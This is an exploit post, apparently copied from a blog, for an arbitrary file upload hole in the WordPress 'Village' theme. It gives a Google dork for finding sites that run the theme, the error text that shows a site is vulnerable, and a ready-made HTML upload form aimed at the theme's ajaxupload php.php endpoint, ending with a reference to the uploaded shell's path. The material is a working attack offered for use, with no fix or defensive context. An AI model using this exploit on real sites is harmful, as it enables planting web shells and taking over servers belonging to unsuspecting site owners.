WordPress Village theme Arbitary File Upload




#- Title: WordPress Village theme Arbitary File Upload
#- Author: -
#- Date: 2014
#- Developer : ThemeProvince
#- Link Download : themeforest .net/item/village-a-responsive-fullscreen-wordpress-theme/237812
#- Google Dork: inurl:"/themes/village/"
#- Fixed in Version : -
#- Tested on : Windows 
======================================================


-- Proof Of Concept --
When Vuln :
{"error":"No files were uploaded."}

CSRF : 

<form enctype="multipart/form-data"
action="site .com/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

Shell Path : Here



Top Link
• Line Mod Terbaru => Here
• Penyedia Hosting Terbaik => Here
Previous
Next Post »
Thanks for your comment